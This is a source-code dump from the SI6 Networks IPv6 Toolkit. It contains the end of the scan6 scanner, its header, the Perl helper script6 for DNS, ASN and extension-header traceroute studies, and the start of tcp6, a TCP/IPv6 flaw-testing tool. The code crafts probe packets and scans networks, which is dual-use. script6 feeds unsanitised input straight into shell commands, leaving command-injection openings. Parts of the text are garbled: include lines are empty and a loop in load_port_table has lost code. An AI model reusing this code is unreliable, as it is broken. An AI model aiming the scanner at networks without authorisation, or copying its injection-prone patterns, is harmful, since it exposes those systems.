"/usr/local/share/ipv6toolkit/service-names-port-numbers.csv", MAX_FILENAME_SIZE-1); return(1); } /* * Function: is_ip6_in_scan_list() * * Check whether an IPv6 address belongs to one of our scan ranges */ int is_ip6_in_scan_list(struct scan_list *scan, struct in6_addr *ip6){ unsigned int i, j; union my6_addr myip6; myip6.in6_addr= *ip6; for(i=0; i< scan->ntarget; i++){ for(j=0; j<8; j++){ if( (ntohs(myip6.s6addr16[j]) < ntohs((scan->target[i])->start.s6addr16[j])) || \ (ntohs(myip6.s6addr16[j]) > ntohs((scan->target[i])->end.s6addr16[j]))){ break; } } if(j == 8) return(1); } return(0); } /* * Handler for the ALARM signal. * * Used for setting a timeout on libpcap reads */ void local_sig_alarm(int num){ if(canjump == 0) return; siglongjmp(env, 1); } /* * Function: load_port_table() * * Create table with mappings of port number -> service name */ int load_port_table(struct port_table_entry *pentry, char *prot, unsigned int maxport){ FILE *fp; char line[MAX_PORTS_LINE_SIZE], proto[MAX_PORTS_LINE_SIZE], name[MAX_PORTS_LINE_SIZE]; char *charptr, *lasts; unsigned int lines=0, ports=0; unsigned int port; char unassigned[]="Unassigned"; /* We initialize all entries to "Unassigned" */ for(i=0; i= maxport) continue; if((charptr = strtok_r(NULL, ",", &lasts)) == NULL){ continue; } strncpy(proto, charptr, sizeof(proto)); proto[sizeof(proto)-1]=0; if(strncmp(prot, proto, sizeof(proto)) == 0){ strncpy(pentry[port].name, name, sizeof(pentry[port].name)); pentry[port].name[sizeof(pentry[port].name)-1]=0; } } if(ferror(fp)){ perror("scan6:"); return(0); } fclose(fp); return(1); } /* * Function: print_port_table() * * Print the port table (for debugging puroses) */ void print_port_table(struct port_table_entry *pentry, unsigned int maxport){ unsigned int i; for(i=0; i < maxport; i++){ printf("%5d (%s)\n", i, pentry[i].name); } } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_TCP; startofprefixes=ptr; } /* * Function: print_port_entries() * * Print port entries */ void print_port_entries(struct port_list *port_list){ int i; for(i=0; i< port_list->nport; i++){ if((port_list->port[i])->start == (port_list->port[i])->end){ printf("%u;", (port_list->port[i])->start); } else{ printf("%u-%u;", (port_list->port[i])->start, (port_list->port[i])->end); } } } ipv6toolkit-2.0+ds.1/tools/scan6.h000066400000000000000000000042371254360455000167430ustar00rootroot00000000000000/* * Header file for the scan6 tool * */ #define BUFFER_SIZE 65556 /* Constants used with the multi_scan_local() function */ #define PROBE_ICMP6_ECHO 1 #define PROBE_UNREC_OPT 2 #define PROBE_TCP 3 #define LOCAL_SRC 1 #define GLOBAL_SRC 2 #define ICMPV6_ECHO_PAYLOAD_SIZE 56 #define MAX_IPV6_ENTRIES 65000 /* Constant for the host-scanning functions */ #define PRINT_ETHER_ADDR 1 #define NOT_PRINT_ETHER_ADDR 0 #define VALID_MAPPING 1 #define INVALID_MAPPING 0 /* Remote scans */ #define LOW_BYTE_1ST_WORD_UPPER 0x1500 #define LOW_BYTE_2ND_WORD_UPPER 0x0100 #define EMBEDDED_PORT_2ND_WORD 5 #define MAX_IEEE_OUIS_LINE_SIZE 160 #define OUI_HEX_STRING_SIZE 5 #define MAX_IEEE_OUIS 1000 #define MAX_SCAN_ENTRIES 65535 #define MAX_PORT_ENTRIES 65536 #define MAX_PREF_ENTRIES MAX_SCAN_ENTRIES #define SELECT_TIMEOUT 4 #define PSCAN_TIMEOUT 1 #define MAX_RANGE_STR_LEN 79 #define MIN_INC_RANGE 1000 /* #define MAX_DESTNATIONS 65535 */ #define MAX_IID_ENTRIES 65535 #define ND_RETRIES 0 /* Constants for config file processing */ #define MAX_LINE_SIZE 250 #define MAX_VAR_NAME_LEN 100 #define MAX_FILENAME_SIZE 250 union my6_addr{ uint8_t s6addr[16]; uint16_t s6addr16[8]; uint32_t s6addr32[4]; struct in6_addr in6_addr; }; /* Stores one remote target to scan */ struct scan_entry{ union my6_addr start; union my6_addr end; union my6_addr cur; }; /* Store the list of remote targets to scan */ struct scan_list{ struct scan_entry **target; unsigned int ctarget; unsigned int ntarget; unsigned int maxtarget; unsigned int inc; }; #define MAX_PORTS_LINE_SIZE 80 /* Stores one port entry to scan */ struct port_entry{ uint16_t start; uint16_t end; uint16_t cur; }; /* Store the list of remote targets to scan */ struct port_list{ struct port_entry **port; unsigned int cport; unsigned int nport; unsigned int maxport; unsigned int proto; struct port_table_entry *port_table; }; /* Store the list of remote targets to scan */ struct port_table_entry{ unsigned int loaded; char name[MAX_PORTS_LINE_SIZE]; }; /* Constants for port scan results */ #define PORT_FILTERED 1 #define PORT_OPEN 2 #define PORT_CLOSED 4 ipv6toolkit-2.0+ds.1/tools/script6000066400000000000000000000527211254360455000170760ustar00rootroot00000000000000#!/usr/bin/perl # # script6: A tool to make complex IPv6 tasks easy # sub GetASN{ @revname=`addr6 -a $_[0] -r`; if($? == 0){ chomp($revname[0]); $queryname= $revname[0] . ".origin6.asn.cymru.com."; @reverse=`host -t TXT $queryname`; if($reverse[0] =~ m/\"\s*((\d+)\s*)\s+|"/){ return($2); } } return(""); } # Function GetORG() # # Obtains the organization corresponding to an autonomous system number (ASN) # sub GetORG{ $querystring="host -t TXT AS".$_[0].".asn.cymru.com"; @asinfo= `$querystring`; if($asinfo[0] =~ m/\"*.\|.*\|.*\|.*\|\s*(.*)\"/){ return($1); } else{ return(""); } } if($ARGV[0] eq "get-aaaa"){ while($domain=){ $aaaa_f=0; chomp($domain); if($domain =~ m/(\S+)/){ $domcmd= $1; } else{ next; } if($domcmd =~ m/^\S*#/){ next; } while(1){ undef @dig; @dig=`dig $domcmd aaaa`; $answer_f=0; foreach $line (@dig){ if($answer_f == 0){ # Detect the "ANSWER" portion of the dig command if($line =~ m/\;\; ANSWER SECTION:/){ $answer_f=1; } next; } elsif($answer_f == 1){ # If we are in the answer portion, look for AAAA records if($line =~ m/^\s*$/){ last; } elsif($line =~ m/(\S+)\s+\d+\s+IN\s+AAAA\s+([a-fA-F0-9:]+)/){ if($aaaa_f == 0){ print "# $domcmd ($1)\n"; } print "$2\n"; # AAAA record $aaaa_f = 1; } # else{ # last; # } } } # If we found AAAA records, try the next domain if($aaaa_f == 1){ last; } # If we didn't find any AAAA records, and the domain name does not start with "www", # add the "www" suffix and see if there are any AAAA records. if($domcmd =~ m/www\.[a-zA-Z_0-9.]/){ last; } else{ $domcmd= "www.$domcmd"; } } } } elsif($ARGV[0] eq "get-mx"){ while($domain=){ # This variable set to 1 indicates that we already found the MX records $mx_f=0; chomp($domain); if($domain =~ m/(\S+)/){ $domcmd= $1; } else{ next; } if($domcmd =~ m/^\S*#/){ next; } if($domcmd =~ m/www\.(\S+)/){ $domcmd = $1; } @dig=`dig $domcmd mx`; $answer_f=0; foreach $line (@dig){ # Detect the "ANSWER" portion of the dig command if($answer_f == 0){ if($line =~ m/\;\; ANSWER SECTION:/){ $answer_f=1; # Found the ANSWER section } next; } elsif($answer_f == 1){ # If we are in the answer portion, look for MX records if($line =~ m/^\s*$/){ # Empty line marks end of ANSWER section last; } elsif($line =~ m/(\S+)\s+\d+\s+IN\s+MX\s+\d+\s+(\S+)/){ # FIrst if($mx_f == 0){ print "# $domcmd ($1)\n"; } printf "$2\n"; # MX record $mx_f = 1; } } } } } elsif($ARGV[0] eq "get-ns"){ while($domain=){ $ns_f=0; chomp($domain); if($domain =~ m/(\S+)/){ $domcmd= $1; } else{ next; } if($domcmd =~ m/^\S*#/){ next; } if($domcmd =~ m/www\.(\S+)/){ $domcmd = $1; } undef @dig; @dig=`dig $domcmd ns`; $answer_f=0; foreach $line (@dig){ if($answer_f == 0){ # Detect the "ANSWER" portion of the dig command if($line =~ m/\;\; ANSWER SECTION:/){ $answer_f=1; } next; } elsif($answer_f == 1){ # If we are in the answer portion, look for AAAA records if($line =~ m/^\s*$/){ last; } elsif($line =~ m/(\S+)\s+\d+\s+IN\s+NS\s+(\S+)/){ if($ns_f == 0){ print "# $domcmd ($1)\n"; } printf "$2\n"; # AAAA record $ns_f = 1; } } } } } elsif($ARGV[0] eq "get-asn" || $ARGV[0] eq "get-asn6"){ @revname=`addr6 -a $ARGV[1] -r`; if($? != 0){ print "Error in specified IPv6 address"; exit(1); } chomp($revname[0]); $queryname= $revname[0] . ".origin6.asn.cymru.com."; @reverse=`host -t TXT $queryname`; #print "salida"; # foreach $line (@reverse){ # print "$line"; # } if($? != 0){ print "Error when trying to obtain ASN information\n"; exit(1); } $reverse[0] =~ m/\"\s*((\d+)\s*)\s+|"/; if($1 eq ""){ print "ASN unknown"; exit(1); } print "$1\n"; exit(0); } elsif($ARGV[0] eq "get-as" || $ARGV[0] eq "get-as6"){ @revname=`addr6 -a $ARGV[1] -r`; if($? != 0){ print "Error in specified IPv6 address\n"; exit(1); } chomp($revname[0]); $queryname= $revname[0] . ".origin6.asn.cymru.com."; @reverse=`host -t TXT $queryname`; if($? != 0){ print "Error when trying to obtain origin AS\n"; exit(1); } $reverse[0] =~ m/\"(.*)\"/; if($1 eq ""){ print "Origin ASN unknown\n"; } else{ print "$1\n"; } $reverse[0] =~ m/"\s*(\d+).*"/; $asn=$1; $querystring="host -t TXT AS".$asn.".asn.cymru.com"; @asinfo= `$querystring`; if($? != 0){ print "Error when trying to obtain ASN information\n"; exit(1); } $asinfo[0] =~ m/\"(.*)\"/; if($1 eq ""){ print "Error when trying to obtain AS information"; } else{ print "$1\n"; } exit(0); } elsif($ARGV[0] eq "get-trace-stats" || $ARGV[0] eq "get-trace6-stats" || $ARGV[0] eq "get-trace-results"){ $valid=0; $dropped=0; $pass=0; $total=0; $sameas=0; $difas=0; $sameas2=0; $difas2=0; $unknownas=0; $unknownipdrop=0; $unknownipfree=0; $unknowniptrouble=0; $ipfreedrop=0; $hoperror=0; $hopzero=0; $unknownas=0; $unknowniporigas=0; $unknownipdropas=0; print "SI6 Networks IPv6 Toolkit v2.0 (Guille)\n"; print "script6: A tool to make complex IPv6 tasks easy\n"; print "[Computing stats....]\n\n"; while($fline=){ chomp($fline); if($fline =~ m/([^\x0d]+)/){ $fline= $1; } # Check whether this line is just a comment -- if so, skip it if($fline =~ m/^((\s)*#)/){ next; } # Skip blanck lines if($fline =~ m/^(\s)*$/){ next; } # Grab elements if($fline =~ m/(\S*)#(\S*)#(\d*)#(\S*)#(\d*)#(\S*)#(\S*)/){ $total++; $iporig= $1; $ipfree= $2; $hopsfree= $3; $iptrouble= $4; $hopstrouble= $5; $ipdrop=$6; $ipdrop2=$7; # Discard this line if we did not learn any host address in the non-EH path6 if($ipfree eq ""){ $unknownipfree++; next; } # Discard this line if we did not learn any address in the path6 with EHs if($iptrouble eq ""){ $unknowniptrouble++; next; } # If the final node in the normal traceroute was not the final destination, discard # this line -- it is impossible to learn where the packets are being dropped if($ipfree ne $iporig){ $ipfreedrop++; next; } # The number of hops from the first-responding node cannot possibly be 0. if($hopsfree == 0){ $hopzero++; next; } # The number of hops till the last responding node cannot be larger for the # EH-case than for the non-EH case. if($hopstrouble > $hopsfree){ $hoperror++; next; } # If packets are being dropped but the address of the node dropping the packets is # unavailable, discard this line if($iporig ne $iptrouble && $ipdrop eq ""){ $unknownipdrop++; next; } # If the line has passed all the previous checks, we consider it to be valid $valid= $valid+1; $delta= $hopsfree - $hopstrouble; # If the last responding node of the EH case is the destination address, then there # are no packet drops if($iporig eq $iptrouble){ $pass=$pass+1; } else{ # Otherwise, there is a packet drop $dropped= $dropped +1; $hops[$delta]++; $asiporig= GetASN($iporig); if($asiporig eq ""){ $unknownas2++; $unknownas++; $unknowniporigas++; next; } $asipdrop= GetASN($ipdrop); if($asipdrop eq ""){ $unknownas++; $unknownipdropas++; } else{ # Count whether the dropping node is in the same or different ASN as the destination node (worst-case) if($asiporig == $asipdrop){ $sameas++; if($destasworst[$asipdrop] == 0){ $numdestasworst++; $destasorgworst[$asipdrop]= GetORG($asipdrop); if($destasorgworst[$asipdrop] eq ""){ $destasorgworst[$asipdrop]="Unknown"; } } $ndestasworst++; $destasworst[$asipdrop]++; } else{ $difas++; if($nondestasworst[$asipdrop] == 0){ $numnondestasworst++; $nondestasorgworst[$asipdrop]= GetORG($asipdrop); if($nondestasorgworst[$asipdrop] eq ""){ $nondestasorgworst[$asipdrop]="Unknown"; } } $nnondestasworst++; $nondestasworst[$asipdrop]++; } } if($ipdrop2 ne ""){ $asipdrop2= GetASN($ipdrop2); if($asipdrop2 eq ""){ $unknownas2++; $unknownipdropas2++; next; } } else{ # If M+2 is "null", we use M+1 if($asipdrop ne ""){ $asipdrop2= $asipdrop; } else{ $unknownas2++; $unknownipdropas2++; next; } } if($asiporig == $asipdrop2){ $sameas2++; if($destasbest[$asipdrop2] == 0){ $numdestasbest++; $destasorgbest[$asipdrop2]= GetORG($asipdrop2); if($destasorgbest[$asipdrop2] eq ""){ $destasorgbest[$asipdrop2]="Unknown"; } } $ndestasbest++; $destasbest[$asipdrop2]++; } else{ $difas2++; if($nondestasbest[$asipdrop2] == 0){ $numnondestasbest++; $nondestasorgbest[$asipdrop2]= GetORG($asipdrop2); if($nondestasorgbest[$asipdrop2] eq ""){ $nondestasorgbest[$asipdrop2]="Unknown"; } } $nnondestasbest++; $nondestasbest[$asipdrop2]++; } } } } # print "Total entries: $total\t Valid entries: $valid\n"; if($valid >= 1){ $passp= ($pass * 100)/$valid; $droppedp= ($dropped * 100)/$valid; printf "Valid entries: %d\tPassed: %d (%.2f%%)\t Dropped: %d (%.2f%%)\n", $valid, $pass, $passp, $dropped, $droppedp; } else{ print "No valid entries were found\n"; } if($dropped >= 1){ print "******************************************************************************\n"; $sameasp= ($sameas * 100)/$dropped; $difasp= ($difas * 100)/$dropped; $unknownasp= ($unknownas * 100)/$dropped; $sameasp2= ($sameas2 * 100)/$dropped; $difasp2= ($difas2 * 100)/$dropped; $unknownasp2= ($unknownas2 * 100)/$dropped; print "PACKET DROPS\n\n"; if($sameas == $sameas2 && $difas == $difas2){ printf "Same ASN: %d (%.2f%%)\t Different ASN: %d (%.2f%%)\t Unknown ASN:%d (%.2f%%)\n", $sameas, $sameasp, $difas, $difasp, $unknownas, $unknownasp; } else{ printf "Best case:\nSame ASN: %d (%.2f%%)\t Different ASN: %d (%.2f%%)\t Unknown ASN:%d (%.2f%%)\n", $sameas2, $sameasp2, $difas2, $difasp2, $unknownas2, $unknownasp2; printf "Worst case:\nSame ASN: %d (%.2f%%)\t Different ASN: %d (%.2f%%)\t Unknown ASN:%d (%.2f%%)\n", $sameas, $sameasp, $difas, $difasp, $unknownas, $unknownasp; } print "******************************************************************************\n"; print "DELTA-HOPS DISTRIBUTION\n\n"; for($i=0; $i<= $#hops; $i++){ if($hops[$i] != 0){ $dhop= ($hops[$i] * 100)/$dropped; printf "Delta-Hop %2d: %6d (%.2f%%)\n", $i, $hops[$i], $dhop; } } print "******************************************************************************\n"; print "AUTONOMOUS SYSTEMS DISTRIBUTION\n"; printf "\nNon-Destination Dropping AS Distribution (best case): (%u ASes)\n\n", $numnondestasbest; if($numnondestasbest == 0){ print "(no ASes)\n"; } for($i=0; $i<= $#nondestasbest; $i++){ if($nondestasbest[$i] != 0){ ($nondestasbest[$i] * 100)/$nnondestasbest; printf "%6d (%.2f%%): AS %5d (%s)\n", $nondestasbest[$i], ($nondestasbest[$i] * 100)/$nnondestasbest, $i, $nondestasorgbest[$i]; } } printf "\nDestination Dropping AS Distribution (best case): (%u ASes)\n\n", $numdestasbest; if($numdestasbest == 0){ print "(no ASes)\n"; } for($i=0; $i<= $#destasbest; $i++){ if($destasbest[$i] != 0){ ($destasbest[$i] * 100)/$ndestasbest; printf "%6d (%.2f%%): AS %5d (%s)\n", $destasbest[$i], ($destasbest[$i] * 100)/$ndestasbest, $i, $destasorgbest[$i]; } } printf "\nNon-Destination Dropping AS Distribution (worst case): (%u ASes)\n\n", $numnondestasworst; if($numnondestasworst == 0){ print "(no ASes)\n"; } for($i=0; $i<= $#nondestasworst; $i++){ if($nondestasworst[$i] != 0){ ($nondestasworst[$i] * 100)/$nnondestasworst; printf "%6d (%.2f%%): AS %5d (%s)\n", $nondestasworst[$i], ($nondestasworst[$i] * 100)/$nnondestasworst, $i, $nondestasorgworst[$i]; } } printf "\nDestination Dropping AS Distribution (worst case): (%u ASes)\n\n", $numdestasworst; if($numdestasworst == 0){ print "(no ASes)\n"; } for($i=0; $i<= $#destasworst; $i++){ if($destasworst[$i] != 0){ ($destasworst[$i] * 100)/$ndestasworst; printf "%6d (%.2f%%): AS %5d (%s)\n", $destasworst[$i], ($destasworst[$i] * 100)/$ndestasworst, $i, $destasorgworst[$i]; } } } if( ($total - $valid) > 0){ print "******************************************************************************\n"; print "VALIDATION OF INPUT DATA\n\n"; printf "Total entries: %d\tValid entries: %d\tInvalid: %d\n", $total, $valid, ($total-$valid); print "Unknown no-EH IPv6: $unknownipfree\tUnknown EH IPv6: $unknowniptrouble\tNo-EH IPv6 != Dst IPv6: $ipfreedrop\n"; print "No-EH Hops==0: $hopzero\tNo-EH Hops < EH Hops: $hoperror\n"; } } elsif($ARGV[0] eq "get-trace-stats-old" || $ARGV[0] eq "get-trace6-stats-old"){ $valid=0; $dropped=0; $pass=0; $total=0; $sameas=0; $difass=0; $unknownas=0; $unknownipdrop=0; $unknownipfree=0; $unknowniptrouble=0; $ipfreedrop=0; $hoperror=0; $hopzero=0; $unknownas=0; $unknowniporigas=0; $unknownipdropas=0; while($fline=){ chomp($fline); if($fline =~ m/([^\x0d]+)/){ $fline= $1; } # Check whether this line is just a comment -- if so, skip it if($fline =~ m/^((\s)*#)/){ next; } # Skip blanck lines if($fline =~ m/^(\s)*$/){ next; } # Grab elements if($fline =~ m/(\S*)#(\S*)#(\d*)#(\S*)#(\d*)#(\S*)/){ $total++; $iporig= $1; $ipfree= $2; $hopsfree= $3; $iptrouble= $4; $hopstrouble= $5; $ipdrop=$6; if($ipfree eq ""){ $unknownipfree++; next; } if($iptrouble eq ""){ $unknowniptrouble++; next; } if($ipfree ne $iporig){ $ipfreedrop++; next; } if($hopsfree == 0){ $hopzero++; next; } if($hopstrouble > $hopsfree){ $hoperror++; next; } $delta= $hopsfree - $hopstrouble; $valid= $valid+1; if($iporig eq $iptrouble){ #notdropped $pass=$pass+1; } else{ $dropped= $dropped +1; $hops[$delta]++; if($ipdrop eq ""){ $unknownipdrop++; $unknownas++; next; } else{ undef @revname; undef @reverse; @revname=`addr6 -a $iporig -r`; chomp($revname[0]); $queryname= $revname[0] . ".origin6.asn.cymru.com."; @reverse=`host -t TXT $queryname`; $reverse[0] =~ m/\"\s*((\d+)\s*)\s+|"/; $asiporig=$2; if($asiporig==0){ $unknownas++; $unknowniporigas++; next; } undef @revname; undef @reverse; @revname=`addr6 -a $ipdrop -r`; chomp($revname[0]); $queryname= $revname[0] . ".origin6.asn.cymru.com."; @reverse=`host -t TXT $queryname`; $reverse[0] =~ m/\"\s*((\d+)\s*)\s+|"/; $asipdrop=$1; if($asipdrop==0){ $unknownas++; $unknownipdropas++; next; } if($asiporig eq "" || $asipdrop eq ""){ $unknownas++; } if($asiporig == $asipdrop){ $sameas++; } else{ $difas++; } } } # print "iporig: $1, ipfree: $2, hopsfree: $3, iptrouble: $4, hopstrouble: $5\n"; } } print "SI6 Networks IPv6 Toolkit v2.0 (Guille)\n"; print "script6: A tool to make complex IPv6 tasks easy\n\n"; # print "Total entries: $total\t Valid entries: $valid\n"; if($valid >= 1){ $passp= ($pass * 100)/$valid; $droppedp= ($dropped * 100)/$valid; printf "Valid entries: %d\tPass: %d (%.2f%%)\t Dropped: %d (%.2f%%)\n", $valid, $pass, $passp, $dropped, $droppedp; print "******************************************************************************\n"; } else{ print "No valid entries were found\n"; } if($dropped >= 1){ $sameasp= ($sameas * 100)/$dropped; $difasp= ($difas * 100)/$dropped; $unknownasp= ($unknownas * 100)/$dropped; print "Packet Drops\n\n"; printf "Same ASN: %d (%.2f%%)\t Different ASN: %d (%.2f%%)\t Unknown ASN:%d (%.2f%%)\n\n", $sameas, $sameasp, $difas, $difasp, $unknownas, $unknownasp; print "Delta-Hops distribution\n\n"; for($i=0; $i<= $#hops; $i++){ if($hops[$i] != 0){ $dhop= ($hops[$i] * 100)/$dropped; printf "DHop %d: %d (%.2f%%)\n", $i, $hops[$i], $dhop; } } } print "******************************************************************************\n"; if( ($total - $valid) > 0){ print "Validation of input data\n\n"; printf "Total entries: %d\tValid entries: %d\tInvalid: %d\n", $total, $valid, ($total-$valid); print "Unknown no-EH IPv6: $unknownipfree\tUnknown EH IPv6: $unknowniptrouble\tNo-EH IPv6 != Dst IPv6: $ipfreedrop\n"; print "No-EH Hops==0: $hopzero\tNo-EH Hops < EH Hops: $hoperror\n"; } } elsif($ARGV[0] eq "get-trace-invalid"){ $valid=0; $dropped=0; $pass=0; $total=0; $sameas=0; $difass=0; $unknownas=0; $unknownipdrop=0; $unknownipfree=0; $unknowniptrouble=0; $ipfreedrop=0; $hoperror=0; $hopzero=0; $unknownas=0; while($fline=){ chomp($fline); if($fline =~ m/([^\x0d]+)/){ $fline= $1; } # Check whether this line is just a comment -- if so, skip it if($fline =~ m/^((\s)*#)/){ next; } # Skip blanck lines if($fline =~ m/^(\s)*$/){ next; } # Grab elements if($fline =~ m/(\S*)#(\S*)#(\d*)#(\S*)#(\d*)#(\S*)/){ $total++; $iporig= $1; $ipfree= $2; $hopsfree= $3; $iptrouble= $4; $hopstrouble= $5; $ipdrop=$6; if($ipfree eq ""){ $unknownipfree++; print "$fline\n"; next; } if($iptrouble eq ""){ $unknowniptrouble++; print "$fline\n"; next; } if($ipfree ne $iporig){ $ipfreedrop++; print "$fline\n"; next; } if($hopsfree == 0){ $hopzero++; print "$fline\n"; next; } if($hopstrouble > $hopsfree){ $hoperror++; print "$fline\n"; next; } } } } elsif($ARGV[0] eq "get-alexa-domains"){ while($line=){ while($line =~ m{\d+,([^/\s]*)}ig){ print "$1\n"; } } } elsif($ARGV[0] eq "trace" || $ARGV[0] eq "trace6" || $ARGV[0] eq "get-trace" || $ARGV[0] eq "get-trace6"){ if($> != 0){ print "Error: This script requires superuser privileges\n"; exit 1; } select STDOUT; $| = 1; $total=0; $response=0; $timeout=0; $ehtype= "do"; $ehsize= "8"; $prototype="icmp"; if($#ARGV > 0){ if($ARGV[1] =~ m/([a-zA-Z]+):?(\d+)/){ $ehtype= lc($1); $ehsize= $2; } else{ $ehtype= $ARGV[1]; } if($#ARGV > 1){ $prototype= $ARGV[2]; if($#ARGV > 2){ $port= $ARGV[3]; } else{ $port= "80"; } } } if($prototype eq "tcp"){ $protoopt= "--tcp-flags S -a $port"; } else{ $protoopt=""; } if($ehtype eq "fh" || $ehtype eq "frag"){ if($ehsize < 8){ print "Error: Fragment size should be larger than or equal to 8 bytes"; exit 1; } elsif($ehsize > 1280){ print "Error: Fragment size should be smaller than or equal to 1280 bytes"; exit 1; } $payload= ($ehsize * 2) - 20; $protoopt="-P $payload " . $protoopt; } if($ehtype eq "fh" || $ehtype eq "frag"){ $eh= "-y $ehsize"; } elsif($ehtype eq "hbh"){ $eh= "-H $ehsize"; } elsif($ehtype eq "do"){ $eh= "-u $ehsize"; } elsif($ehtype eq "ah"){ $eh= "-p ah"; } elsif($ehtype eq "esp"){ $eh= "-p esp"; } else{ print "Error: Unknown EH type"; exit 1; } # print "path6 -d NOSPEC -p $prototype $protoopt --rate-limit 20pps\n"; # print "path6 -d NOSPEC -p $prototype $protoopt $eh --rate-limit 20pps\n"; while($fline=){ chomp($fline); if($fline =~ m/([^\x0d]+)/){ $fline= $1; } # Check whether this line is just a comment -- if so, skip it if($fline =~ m/^((\s)*#)/){ next; } # Skip blanck lines if($fline =~ m/^(\s)*$/){ next; } # Remove all items from the array of IP addresses undef @ipsfree; undef @tcp; $maxhopsfree=0; $maxhopsfreeip=""; @tcp=`path6 -d $fline -p $prototype $protoopt`; # --rate-limit 25pps if($? != 0){ next; } foreach $line (@tcp){ # Discard lines that do not contain a "probe" line if($line =~ m/\s+(\d+)\s+\((\S*)\)/){ if($1 > $maxhopsfree){ if($2 ne ""){ $maxhopsfree=$1; $maxhopsfreeip=$2; } # We store the IPv6 addresses of all hops push(@ipsfree, $2); } } } undef @tcp; $maxhopstrouble=0; $maxhopstroubleip=""; # XXX: This is an ugly hack. should be removed. ESP and AH should possibly be handled as EHs, rather than probe types if($ehtype eq "esp" || $ehtype eq "ah"){ @tcp=`path6 -d $fline $eh`; # --rate-limit 25pps }else{ @tcp=`path6 -d $fline -p $prototype $protoopt $eh`; # --rate-limit 25pps } if($? != 0){ next; } foreach $line (@tcp){ # Discard lines that do not contain a "probe" line if($line =~ m/\s+(\d+)\s+\((\S*)\)/){ if($1 > $maxhopstrouble){ if($2 ne ""){ $maxhopstrouble=$1; $maxhopstroubleip= $2; } } } } $dropip=""; $dropip2=""; for($i=0; $i<= $#ipsfree; $i++){ if($ipsfree[$i] eq $maxhopstroubleip){ if($i == $#ipsfree){ $dropip= $ipsfree[$i]; } else{ $dropip= $ipsfree[$i+1]; } if($dropip eq $fline){ $dropip2= $dropip; } else{ $dropip2= $ipsfree[$i+2]; if($dropip2 eq ""){ $dropip2= $dropip; } } last; } } print "$fline#$maxhopsfreeip#$maxhopsfree#$maxhopstroubleip#$maxhopstrouble#$dropip#$dropip2\n"; } } else{ print "SI6 Networks IPv6 Toolkit v2.0 (Guille)\n"; print "script6: A tool to make complex IPv6 tasks easy\n"; } ipv6toolkit-2.0+ds.1/tools/tcp6.c000066400000000000000000002367761254360455000166170ustar00rootroot00000000000000/* * tcp6 : A security assessment tool that exploits potential flaws in the * processing of TCP/IPv6 packets * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make tcp6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "tcp6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); void frag_and_send(struct iface_data *); unsigned int queue_data(struct tcp_queue *, unsigned char *, unsigned int); unsigned int dequeue_data(struct tcp_queue *, unsigned char *, unsigned int); unsigned int queue_copy(struct 